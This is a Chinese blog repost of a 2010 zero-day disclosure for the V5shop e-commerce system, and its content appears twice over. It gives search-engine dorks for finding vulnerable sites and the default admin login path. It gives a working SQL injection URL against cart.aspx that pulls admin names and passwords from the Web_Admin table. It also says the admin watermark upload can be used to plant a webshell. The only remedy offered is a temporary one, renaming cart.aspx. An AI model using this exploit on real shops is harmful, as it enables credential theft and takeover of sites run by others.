上一篇
下一篇
v5shop 网上商城系统oday
作者:admin 日期:2010-07-18
漏洞文件:cart.aspx
关键字:services.aspxid=
inurl:scoreindex.aspx
默认后台地址:weblogin/Login.aspx
以下是测试EXP:
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 order by [Name],[Pass]) T order by [Name] desc,[Pass] desc)>0 --
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
非安全中国安全建议:
目前官方没有发布相关补丁或升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
www.v5shop.com.cn (官网网站)
临时修复方法,把cart.aspx临时改名
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1231.html
关键字:services.aspxid=
inurl:scoreindex.aspx
默认后台地址:weblogin/Login.aspx
以下是测试EXP:
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 order by [Name],[Pass]) T order by [Name] desc,[Pass] desc)>0 --
weblogin/System_Config_Operate.aspx
后台上传水印.可以直接上传大马.
非安全中国安全建议:
目前官方没有发布相关补丁或升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
www.v5shop.com.cn (官网网站)
临时修复方法,把cart.aspx临时改名
文章转载自『非安全中国网』地址: http://www.sitedir.com.cn/exploit-1231.html
文章来自: 
引用通告: 
Tags: 评论: 0 | 引用: 0 | 查看次数: 34
发表评论
